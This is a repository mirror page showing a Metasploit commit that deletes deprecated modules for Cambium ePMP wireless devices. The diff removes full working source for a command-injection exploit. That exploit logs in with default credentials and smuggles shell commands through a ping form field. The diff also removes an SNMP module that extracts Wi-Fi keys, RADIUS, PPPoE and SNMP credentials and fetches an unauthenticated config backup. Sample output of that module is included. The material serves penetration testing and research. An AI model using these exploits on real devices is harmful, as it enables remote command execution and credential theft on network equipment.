infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10121, finish deprecating modules

4.x
Brent Cook 2018-06-02 14:33:26 -05:00 committed by Metasploit
parent 40489fd1f1
commit 650c5c7a93
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
5 changed files with 0 additions and 492 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md → documentation/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.md
View File

71
documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md
View File

@ -1,71 +0,0 @@
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information.
This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication.
The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
```
snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0
```
## Verification Steps
1. Do: ```use auxiliary/scanner/snmp/epmp_snmp_loot```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
```
msf > use auxiliary/scanner/snmp/epmp_snmp_loot
msf auxiliary(epmp_snmp_loot) > set rhosts 1.3.3.7
msf auxiliary(epmp_snmp_loot) > set COMMUNITY private
msf auxiliary(epmp_snmp_loot) > run
msf auxiliary(epmp_snmp-final) > run
[*] Fetching System Information...
[+] 1.3.3.7
[+] SNMP System Name: Cambium
[+] SNMP System Description: Cambium
[+] Device UpTime: 0021:08:36:45
[+] U-boot version: U-Boot 9350_PX 1.1.4.e (Feb 24 2016 - 20:14:38)
[*] Fetching SNMP Information...
[+] SNMP read-only community name: public
[+] SNMP read-write community name: private
[+] SNMP Trap Community: cambiumtrap
[+] SNMP Trap Server IP Address: Null
[*] Fetching WIFI Information...
[+] Wireless Interface SSID: SSID
[+] Wireless Interface Encryption Key: secretkey
[+] Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): 2
[*] Fetching WIFI Radius Information...
[+] RADIUS server info:
[+] RADIUS server port: Null
[+] RADIUS server secret: Null
[+] Wireless Radius Username: cambium-station
[+] Wireless Radius Password: cambium
[*] Fetching Network PPPoE Information...
[+] Network PPPoE Service Name: temp
[+] Network PPPoE Username: username
[+] Network PPPoE Password: password
[+] Cambium ePMP loot saved at /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_cambium_snmp_loot_838642.txt
[+] Configuration backed-up for direct download at: http://1.3.3.7/dl/3.2.2_00000000000001.json
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

1
modules/auxiliary/scanner/discovery/udp_probe.rb
View File

@ -8,7 +8,6 @@ require 'openssl'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Module::Deprecated
def initialize
super(

261
modules/auxiliary/scanner/http/epmp1000_cmd_exec.rb
View File

@ -1,261 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Module::Deprecated
deprecated(Date.new(2018, 2, 24), 'auxiliary/scanner/http/epmp1000_ping_cmd_exec')
def initialize(info={})
super(update_info(info,
'Name' => 'Cambium ePMP 1000 (up to v2.5) Arbitrary Command Execution',
'Description' => %{
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands.
},
'References' =>
[
['URL', 'http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/'],
['URL', 'https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83']
],
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
],
'License' => MSF_LICENSE
)
)
register_options(
[
Opt::RPORT(80), # Application may run on a different port too. Change port accordingly.
OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'installer']),
OptString.new('PASSWORD', [true, 'A specific password to authenticate with', 'installer']),
OptString.new('CMD', [true, 'Command(s) to run', 'id; pwd'])
], self.class
)
end
def run_host(ip)
unless is_app_epmp1000?
return
end
each_user_pass do |user, pass|
do_login(user, pass)
end
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: Time.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
#
# Check if App is Cambium ePMP 1000
#
def is_app_epmp1000?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
}
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
return false
end
good_response = (
res &&
res.code == 200 &&
res.headers['Server'] &&
(res.headers['Server'].include?('Cambium HTTP Server') || res.body.include?('cambiumnetworks.com'))
)
if good_response
get_epmp_ver = res.body.match(/"sw_version">([^<]*)/)
if !get_epmp_ver.nil?
epmp_ver = get_epmp_ver[1]
if !epmp_ver.nil?
print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
if "#{epmp_ver}" >= '2.5'
print_error('This ePMP version is not vulnerable. Module will not continue.')
return false
else
return true
end
else
print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000...")
return true
end
end
else
print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. Module will not continue.")
return false
end
end
#
# Execute arbitrary command(s)
#
def do_login(user, pass)
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
res = send_request_cgi(
{
'uri' => '/cgi-bin/luci',
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest',
'Accept' => 'application/json, text/javascript, */*; q=0.01'
},
'vars_post' =>
{
'username' => 'dashboard',
'password' => ''
}
}
)
good_response = (
res &&
res.code == 200
)
if good_response
sysauth_value = res.get_cookies_parsed.scan(/((.*)[$ ])/).flatten[0] || ''
cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
res = send_request_cgi(
{
'uri' => '/cgi-bin/luci',
'method' => 'POST',
'cookie' => cookie1,
'headers' => {
'X-Requested-With' => 'XMLHttpRequest',
'Accept' => 'application/json, text/javascript, */*; q=0.01',
'Connection' => 'close'
},
'vars_post' =>
{
'username' => user,
'password' => pass
}
}
)
end
good_response = (
res &&
res.code == 200 &&
res.get_cookies_parsed.scan(/(stok=(.*))/).flatten[0]
)
if good_response
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
report_cred(
ip: rhost,
port: rport,
service_name: 'Cambium ePMP 1000',
user: user,
password: pass
)
get_stok = res.get_cookies.scan(/(stok=(.*))/) || ''
if !get_stok.nil?
stok_value = get_stok[1]
sysauth_value = res.get_cookies.scan(/((.*)[$ ])/).flatten[0] || ''
cookie2 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
uri1 = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/ping'
command = datastore['CMD']
inject = '|' + "#{command}" + ' ||'
clean_inject = CGI.unescapeHTML(inject.to_s)
print_status("#{rhost}:#{rport} - Executing #{command}")
res = send_request_cgi(
{
'uri' => uri1,
'method' => 'POST',
'cookie' => cookie2,
'headers' => {
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'X-Requested-With' => 'XMLHttpRequest',
'ctype' => '*/*',
'Connection' => 'close'
},
'vars_post' =>
{
'ping_ip' => '8.8.8.8',
'packets_num' => clean_inject,
'buf_size' => 0,
'ttl' => 1,
'debug' => '0'
}
}
)
# Extract ePMP version
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
}
)
epmp_ver = res.body.match(/"sw_version">([^<]*)/)[1]
report_cred(
ip: rhost,
port: rport,
service_name: "Cambium ePMP 1000 v#{epmp_ver}",
user: user,
password: pass
)
else
# Login failed
print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
end
end
end
end
end

159
modules/auxiliary/scanner/snmp/cambium_snmp_loot.rb
View File

@ -1,159 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Module::Deprecated
deprecated(Date.new(2018, 2, 24), 'auxiliary/scanner/snmp/epmp1000_snmp_loot')
def initialize
super(
'Name' => 'Cambium ePMP SNMP Enumeration',
'Description' => %q{
Cambium devices (ePMP, PMP, Force, & others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
},
'References' =>
[
['URL', 'XXX']
],
'Author' => ['Karn Ganeshen'],
'License' => MSF_LICENSE
)
register_options(
[
OptInt.new('TIMEOUT', [ true, "HTTP connection timeout", 10]),
])
end
def run_host(ip)
begin
snmp = connect_snmp
epmp_info = ''
# System Info
snmpSystemName = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.3.0')
snmpSystemDescription = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.4.0')
cambiumSystemUptime = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.4.0')
cambiumUbootVersion = snmp.get_value('1.3.6.1.4.1.17713.21.1.1.14.0')
epmp_info << "SNMP System Name: #{snmpSystemName}" << "\n"
epmp_info << "SNMP System Description: #{snmpSystemDescription}" << "\n"
epmp_info << "Device UpTime: #{cambiumSystemUptime}" << "\n"
epmp_info << "U-boot version: #{cambiumUbootVersion}" << "\n"
# SNMP Info
snmpReadOnlyCommunity = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.1.0')
snmpReadWriteCommunity = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.2.0')
snmpTrapCommunity = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.6.0')
snmpTrapEntryIP = snmp.get_value('1.3.6.1.4.1.17713.21.3.5.7.1.2.0')
epmp_info << "SNMP read-only community name: #{snmpReadOnlyCommunity}" << "\n"
epmp_info << "SNMP read-write community name: #{snmpReadWriteCommunity}" << "\n"
epmp_info << "SNMP Trap Community: #{snmpTrapCommunity}" << "\n"
epmp_info << "SNMP Trap Server IP Address: #{snmpTrapEntryIP}" << "\n"
# WIFI Radius Info
wirelessRadiusServerInfo = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.5.0')
wirelessRadiusServerPort = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.3.0')
wirelessRadiusServerSecret = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.6.1.1.4.0')
wirelessRadiusUsername = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.8.0')
wirelessRadiusPassword = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.5.9.0')
epmp_info << "RADIUS server info: #{wirelessRadiusServerInfo}" << "\n"
epmp_info << "RADIUS server port: #{wirelessRadiusServerPort}" << "\n"
epmp_info << "RADIUS server secret: #{wirelessRadiusServerSecret}" << "\n"
epmp_info << "Wireless Radius Username: #{wirelessRadiusUsername}" << "\n"
epmp_info << "Wireless Radius Password: #{wirelessRadiusPassword}" << "\n"
# WIFI Info
wirelessInterfaceSSID = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.2.0')
wirelessInterfaceEncryptionKey = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.4.0')
wirelessInterfaceEncryption = snmp.get_value('1.3.6.1.4.1.17713.21.3.8.2.3.0')
epmp_info << "Wireless Interface SSID: #{wirelessInterfaceSSID}" << "\n"
epmp_info << "Wireless Interface Encryption Key: #{wirelessInterfaceEncryptionKey}" << "\n"
epmp_info << "Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wirelessInterfaceEncryption}" << "\n"
# Network PPPoE config
networkWanPPPoEService = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.13.0')
networkWanPPPoEUsername = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.10.0')
networkWanPPPoEPassword = snmp.get_value('1.3.6.1.4.1.17713.21.3.4.3.11.0')
epmp_info << "Network PPPoE Service Name: #{networkWanPPPoEService}" << "\n"
epmp_info << "Network PPPoE Username: #{networkWanPPPoEUsername}" << "\n"
epmp_info << "Network PPPoE Password: #{networkWanPPPoEPassword}" << "\n"
# Printing captured info
print_status("Fetching System Information...\n")
print_good("#{ip}")
print_good("SNMP System Name: #{snmpSystemName}")
print_good("SNMP System Description: #{snmpSystemDescription}")
print_good("Device UpTime: #{cambiumSystemUptime}")
print_good("U-boot version: #{cambiumUbootVersion} \n")
print_status("Fetching SNMP Information...\n")
print_good("SNMP read-only community name: #{snmpReadOnlyCommunity}")
print_good("SNMP read-write community name: #{snmpReadWriteCommunity}")
print_good("SNMP Trap Community: #{snmpTrapCommunity}")
print_good("SNMP Trap Server IP Address: #{snmpTrapEntryIP} \n")
print_status("Fetching WIFI Information...\n")
print_good("Wireless Interface SSID: #{wirelessInterfaceSSID}")
print_good("Wireless Interface Encryption Key: #{wirelessInterfaceEncryptionKey}")
print_good("Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wirelessInterfaceEncryption} \n")
print_status("Fetching WIFI Radius Information...\n")
print_good("RADIUS server info: #{wirelessRadiusServerInfo}")
print_good("RADIUS server port: #{wirelessRadiusServerPort}")
print_good("RADIUS server secret: #{wirelessRadiusServerSecret}")
print_good("Wireless Radius Username: #{wirelessRadiusUsername}")
print_good("Wireless Radius Password: #{wirelessRadiusPassword} \n")
print_status("Fetching Network PPPoE Information...\n")
print_good("Network PPPoE Service Name: #{networkWanPPPoEService}")
print_good("Network PPPoE Username: #{networkWanPPPoEUsername}")
print_good("Network PPPoE Password: #{networkWanPPPoEPassword} \n")
# Woot we got loot.
loot_name = 'cambium_snmp'
loot_type = 'text/plain'
loot_filename = 'cambium_snmp.txt'
loot_desc = 'Cambium ePMP configuration data'
p = store_loot(loot_name, loot_type, datastore['RHOST'], epmp_info, loot_filename, loot_desc)
print_good("Cambium ePMP loot saved at #{p}")
# set request
backup_oid = '1.3.6.1.4.1.17713.21.6.4.10.0'
enable_backup = '1'
varbind = SNMP::VarBind.new(backup_oid,SNMP::OctetString.new(enable_backup))
snmp.set(varbind)
backup_location_oid = '1.3.6.1.4.1.17713.21.6.4.13.0'
backup_location = snmp.get_value(backup_location_oid)
print_good("Configuration backed-up for direct download at: #{backup_location}")
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::InvalidIpAddress
print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
elog("Unknown error: #{e.class} #{e}")
elog("Call stack:\n#{e.backtrace.join "\n"}")
ensure
disconnect_snmp
end
end
end